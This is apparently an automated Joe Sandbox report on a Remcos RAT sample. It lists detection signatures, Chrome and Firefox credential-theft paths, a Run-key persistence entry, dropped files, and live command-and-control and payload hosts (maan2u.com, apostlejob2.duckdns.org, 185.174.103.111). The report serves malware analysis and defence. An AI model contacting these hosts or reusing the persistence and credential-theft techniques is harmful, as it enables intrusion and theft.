                Source: Yara matchFile source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SEPTobn3BR.exe PID: 7648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7920, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 3232, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 6756, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Contains functionality to steal Chrome passwords or cookies
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data5_2_0309A953
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data10_2_0299A953
                Contains functionality to steal Firefox passwords or cookies
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\5_2_0309AA71
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \key3.db5_2_0309AA71
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\10_2_0299AA71
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \key3.db10_2_0299AA71

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Windows\SysWOW64\colorcpl.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-3W4HX7Jump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-3W4HX7Jump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-3W4HX7Jump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3812934475.00000000313BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1623286615.000000001ECB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3812571420.00000000311A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1526792578.0000000000758000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3812685840.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.2755366865.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SEPTobn3BR.exe PID: 7648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7920, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 3232, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 6756, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: cmd.exe5_2_0309567A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: cmd.exe10_2_0299567A

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure1
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		12
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter                		1
                Valid Accounts                		1
                Valid Accounts                		2
                Obfuscated Files or Information                		211
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol211
                Input Capture                		21
                Encrypted Channel                		Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts2
                Service Execution                		1
                Windows Service                		11
                Access Token Manipulation                		1
                DLL Side-Loading                		2
                Credentials In Files                		1
                System Service Discovery                		SMB/Windows Admin Shares3
                Clipboard Data                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                Registry Run Keys / Startup Folder                		1
                Windows Service                		11
                Masquerading                		NTDS1
                System Network Connections Discovery                		Distributed Component Object ModelInput Capture1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script322
                Process Injection                		1
                Valid Accounts                		LSA Secrets2
                File and Directory Discovery                		SSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Registry Run Keys / Startup Folder                		2
                Virtualization/Sandbox Evasion                		Cached Domain Credentials45
                System Information Discovery                		VNCGUI Input Capture113
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Access Token Manipulation                		DCSync331
                Security Software Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job322
                Process Injection                		Proc Filesystem2
                Virtualization/Sandbox Evasion                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow2
                Process Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                Application Window Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                System Owner/User Discovery                		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578037 Sample: SEPTobn3BR.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 52 www.maan2u.com 2->52 54 maan2u.com 2->54 56 geoplugin.net 2->56 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 14 other signatures 2->66 8 SEPTobn3BR.exe 1 9 2->8         started        13 Emxwenem.PIF 5 2->13         started        15 Emxwenem.PIF 6 2->15         started        signatures3 process4 dnsIp5 58 maan2u.com 103.82.231.117, 443, 49709, 49710 GIGABIT-MYGigabitHostingSdnBhdMY Malaysia 8->58 40 C:\Users\Public\Librariesmxwenem.PIF, PE32 8->40 dropped 42 C:\Users\Public\Libraries\FX.cmd, DOS 8->42 dropped 44 C:\Users\Public\Librariesmxwenem, data 8->44 dropped 46 C:\Users\Publicmxwenem.url, MS 8->46 dropped 76 Early bird code injection technique detected 8->76 78 Drops PE files with a suspicious file extension 8->78 80 Allocates memory in foreign processes 8->80 92 2 other signatures 8->92 17 colorcpl.exe 2 16 8->17         started        22 cmd.exe 1 8->22         started        82 Antivirus detection for dropped file 13->82 84 Multi AV Scanner detection for dropped file 13->84 86 Machine Learning detection for dropped file 13->86 24 colorcpl.exe 13->24         started        26 cmd.exe 13->26         started        88 Sample is not signed and drops a device driver 15->88 90 Allocates many large memory junks 15->90 28 colorcpl.exe 15->28         started        30 cmd.exe 1 15->30         started        file6 signatures7 process8 dnsIp9 48 185.174.103.111, 2404, 49725 ASN-QUADRANET-GLOBALUS Ukraine 17->48 50 geoplugin.net 178.237.33.50, 49736, 80 ATOM86-ASATOM86NL Netherlands 17->50 38 C:\ProgramData\remcos\logs.dat, data 17->38 dropped 68 Detected Remcos RAT 17->68 70 Contains functionalty to change the wallpaper 17->70 72 Contains functionality to steal Chrome passwords or cookies 17->72 74 4 other signatures 17->74 32 conhost.exe 22->32         started        34 conhost.exe 26->34         started        36 conhost.exe 30->36         started        file10 signatures11 process12

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SEPTobn3BR.exe67%VirustotalBrowse
                SEPTobn3BR.exe55%ReversingLabsWin32.Trojan.ModiLoader
                SEPTobn3BR.exe100%AviraHEUR/AGEN.1326052
                SEPTobn3BR.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\Public\Libraries\Emxwenem.PIF100%AviraHEUR/AGEN.1326052
                C:\Users\Public\Libraries\Emxwenem.PIF100%Joe Sandbox ML
                C:\Users\Public\Libraries\Emxwenem.PIF55%ReversingLabsWin32.Trojan.ModiLoader

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.pmail.com00%Avira URL Cloudsafe
                https://www.maan2u.com/docs/233_Emxwenem0%Avira URL Cloudsafe
                https://www.maan2u.com/docs/233_Emxwenemixg80%Avira URL Cloudsafe
                https://www.maan2u.com/docs/233_Emxwenemixg0%Avira URL Cloudsafe
                https://www.maan2u.com:443/docs/233_Emxwenemixg0%Avira URL Cloudsafe
                apostlejob2.duckdns.org0%Avira URL Cloudsafe
                https://www.maan2u.com/docs/233_Emxwenemixg50%Avira URL Cloudsafe
                https://www.maan2u.com/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                geoplugin.net
                		178.237.33.50
                		truefalse
                  		high
                  s-part-0035.t-0009.t-msedge.net
                  		13.107.246.63
                  		truefalse
                    		high
                    maan2u.com
                    		103.82.231.117
                    		truetrue
                      		unknown
                      www.maan2u.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://geoplugin.net/json.gpfalse
                          		high
                          https://www.maan2u.com/docs/233_Emxwenemixgtrue
                          • Avira URL Cloud: safe
                          		unknown
                          apostlejob2.duckdns.orgtrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://sectigo.com/CPS0SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://ocsp.sectigo.com0SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://geoplugin.net/json.gp/CSEPTobn3BR.exe, 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmpfalse
                                    		high
                                    http://geoplugin.net/json.gplcolorcpl.exe, 00000005.00000002.3812685840.00000000311F5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2755366865.00000000311F5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.1465318188.00000000311F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.maan2u.com/docs/233_EmxwenemSEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020ACD000.00000004.00001000.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://geoplugin.net/json.gp4colorcpl.exe, 00000005.00000003.1465318188.00000000311F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.maan2u.com/docs/233_Emxwenemixg5SEPTobn3BR.exe, 00000000.00000002.1420164294.000000000060A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.maan2u.com:443/docs/233_EmxwenemixgSEPTobn3BR.exe, 00000000.00000002.1420164294.0000000000633000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.maan2u.com/docs/233_Emxwenemixg8SEPTobn3BR.exe, 00000000.00000002.1420164294.0000000000633000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://geoplugin.net/json.gpSystem32colorcpl.exe, 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://ocsp.sectigo.com0CSEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.maan2u.com/SEPTobn3BR.exe, 00000000.00000002.1420164294.0000000000628000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://geoplugin.net/json.gp=colorcpl.exe, 00000005.00000003.2755366865.00000000311F5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.1465318188.00000000311F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.pmail.com0SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A5A000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000002.1626895029.0000000020B19000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  185.174.103.111
                                                  		unknownUkraine
                                                  		8100ASN-QUADRANET-GLOBALUStrue
                                                  103.82.231.117
                                                  		maan2u.comMalaysia
                                                  		55720GIGABIT-MYGigabitHostingSdnBhdMYtrue
                                                  178.237.33.50
                                                  		geoplugin.netNetherlands
                                                  		8455ATOM86-ASATOM86NLfalse

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1578037
                                                  Start date and time:2024-12-19 07:59:15 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 10m 31s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:19
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:SEPTobn3BR.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:ccdcd04a0ffde31366754018598eb02f.exe
                                                  Detection:MAL
                                                  Classification:mal100.rans.troj.spyw.evad.winEXE@21/8@2/3
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 99%
                                                  • Number of executed functions: 75
                                                  • Number of non-executed functions: 220
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  02:00:19API Interceptor2x Sleep call for process: SEPTobn3BR.exe modified
                                                  02:00:38API Interceptor4x Sleep call for process: Emxwenem.PIF modified
                                                  02:01:02API Interceptor6263009x Sleep call for process: colorcpl.exe modified
                                                  08:00:29AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Emxwenem C:\Users\Public\Emxwenem.url
                                                  08:00:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Emxwenem C:\Users\Public\Emxwenem.url

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  185.174.103.111greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
